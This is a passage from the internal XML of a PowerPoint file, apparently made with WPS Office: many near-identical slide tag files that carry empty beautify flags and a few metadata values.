<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1121.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1122.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1123.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1124.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1125.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1126.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1127.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1128.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1129.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag113.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1130.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1131.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1132.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1133.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1134.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1135.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1136.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1137.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1138.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1139.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag114.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1140.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1141.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1142.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1143.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1144.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1145.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1146.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1147.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1148.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1149.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag115.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1150.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1151.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1152.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1153.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1154.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1155.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1156.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1157.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1158.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1159.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag116.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1160.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1161.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1162.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1163.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1164.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1165.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1166.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1167.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1168.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1169.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag117.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1170.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1171.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1172.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1173.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1174.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1175.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1176.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WPP_MARK_KEY" val="0b39fdc4-c042-4361-aa1e-da0ba7bcedd1"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiZTg2NTYwM2U4ZTBlNjMzYWE3Mjc1NDQ3OGZmODBmNjkifQ=="/>
</p:tagLst>
</file>

<file path=ppt/tags/tag118.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag119.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag120.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag121.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag122.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag123.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag124.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag125.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag126.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag127.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag128.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag129.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag130.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag131.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag132.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag133.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag134.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag135.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag136.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag137.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag138.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag139.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag140.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag141.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag142.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag143.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag144.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag145.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag146.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag147.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag148.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag149.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag150.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag151.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag152.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag153.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag154.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag155.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag156.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag157.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag158.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag159.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag160.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag161.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag162.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag163.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag164.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag165.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag166.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag167.xml><?xml version="1.0" encoding="utf-8"?>
